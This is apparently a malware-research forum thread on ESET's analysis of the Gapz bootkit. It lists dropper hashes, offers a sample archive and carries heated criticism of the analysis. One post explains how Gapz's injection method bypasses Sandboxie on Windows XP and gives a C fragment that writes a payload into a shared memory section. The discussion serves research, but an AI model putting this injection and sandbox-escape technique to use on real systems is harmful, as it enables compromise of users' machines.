Page 1 of 3

Bootkit: Win32/Gapz

PostPosted: Thu Dec 27, 2012 12:27 pm
by R136a1
Hi there,

ESET (Aleksandr Matrosov) released an analysis of an interesting new Bootkit:

Win32/Gapz: steps of evolution
Win32/Gapz: New Bootkit Technique

Hashes of droppers and MBR are as follows:

Win32/Gapz.A (dropper)
SHA1 hash: 1f206ea64fb3ccbe0cd7ff7972bef2592bb30c84

Win32/Gapz.A (dropper)
SHA1 hash: dff6933199137cc49c2af5f73a2d431ce2e41084

Win32/Gapz.B (dropper)
SHA1 hash: e4b64c3672e98dc78c5a356a68f89e02154ce9a6

Win32/Gapz.C (dropper)
SHA1 hash: 85fb77682705b06a77d73638df3b22ac1dbab78b

Win32/Gapz.C (MBR)
SHA1 hash: b37afc51104688ea74d279b690d8631d4c0db2ad

If someone can provide a sample, please upload. Thanks!

Re: Bootkit: Win32/Gapz

PostPosted: Thu Dec 27, 2012 1:01 pm
by 360Tencent
3 droppers

Win32Gapz.zip

Re: Bootkit: Win32/Gapz

PostPosted: Sat Dec 29, 2012 5:29 am
by kmd
http://blog.eset.com/2012/12/27/win32gapz-steps-of-evolution


very "professional" analysis from twitter expert.

I. Shell_TrayWnd inject was publically available since 2009 and was initially posted on virustech.org - PUBLIC forum as PUBLIC post.
II. SetWindowLongA it call sets address of injected shellcode not KiUserApcDispatcher (wtf Matrosov?) as proflink use 82a19f2e4c9a1b4295a51df9d23af84aae848a7984c141a0c7f67b3bbb77b271 attached sample. Break on SetWindowLongA - address it points located in explorer.exe address space - dump it and look inside.

Re: Bootkit: Win32/Gapz

PostPosted: Sat Dec 29, 2012 6:58 am
by Mut4nt
This crap looks like that was made by skiddies

Re: Bootkit: Win32/Gapz

PostPosted: Sat Dec 29, 2012 11:04 am
by EP_X0FF
Matrosov maybe not really understand what he reverse, this happens sometimes with everyone (with some people more often) but what exactly you found in this "crap" that made you think
Mut4nt wrote:looks like that was made by skiddies


:?:

Re: Bootkit: Win32/Gapz

PostPosted: Mon Dec 31, 2012 7:53 am
by stds
Mut4nt wrote:This crap looks like that was made by skiddies


I remember reversing one of your programs you tried to sell on hackforums, you had copy and pasted a public DKOM rootkit into a crypter, you even left in the debug strings from the original author.

I don't think you have any room to be calling anyting crap....Especially not a bootkit....

Re: Bootkit: Win32/Gapz

PostPosted: Tue Feb 12, 2013 3:17 pm
by bao

Re: Bootkit: Win32/Gapz

PostPosted: Tue Mar 05, 2013 8:54 am
by 0x16/7ton
Hello :)
Yes maybe it is a bad article ,but i wrote her:
http://inresearching.blogspot.ru/2013/03/win32gapz-family-ring0-payload.html

Re: Bootkit: Win32/Gapz

PostPosted: Wed Mar 20, 2013 3:48 am
by kmd

Re: Bootkit: Win32/Gapz

PostPosted: Wed Mar 20, 2013 4:01 pm
by EP_X0FF
kmd wrote:Sandboxie bypassed by gapz?

http://exelab.ru/f/index.php?action=vth ... &page=1#11


The method of code injection used by Gapz is not isolated by Sandboxie 3.76 and Sandboxie 4.01 (Windows XP only), x86. As sandboxing 4.0x now uses limited accounts for sandboxed processes it is indeed more difficult to exploit - arbitrary code execution also will not work from restricted account, as GetWindowLongPtr/SetWindowLongPtr will fail. It is very boring to test but if you want you can follow steps described in that link from exelab.

Code: Select all
RtlInitUnicodeString(&usShimSection, L"\\BaseNamedObjects\\ShimSharedMemory");
InitializeObjectAttributes(&obja, &usShimSection, OBJ_CASE_INSENSITIVE, NULL, NULL);
Status = NtOpenSection(&hSection, GENERIC_WRITE, &obja);
if ( NT_SUCCESS(Status) ) {
      Status = NtMapViewOfSection(
      hSection,
      GetCurrentProcess(),
      (PVOID*)&BaseAddress,
      0,
      0,
      NULL,
      &ViewSize,
      ViewUnmap,
      0,
      PAGE_READWRITE
   );
memcpy ((BaseAddress + ViewSize) - sizeof(payload), payload, sizeof(payload));


If Sandboxie allows this, then this kind of sandboxing is one big lulz and successful explotation of this code is a question of just another exploit suitable for arbitrary code execution. Need more testing in various systems, various sections. As this is paid software I have no intentions to help author fix his ridiculous bugs or mistakes in sandbox architecture overall.

This method of arbitrary code execution was known for years before Matrosov "discovery" and we pretty sure know how and where he found it, hmm.. "itw".

If you really care about security you already use virtual machine (freeware btw), not paid half-part implemented virtualization with sleeping zerodays.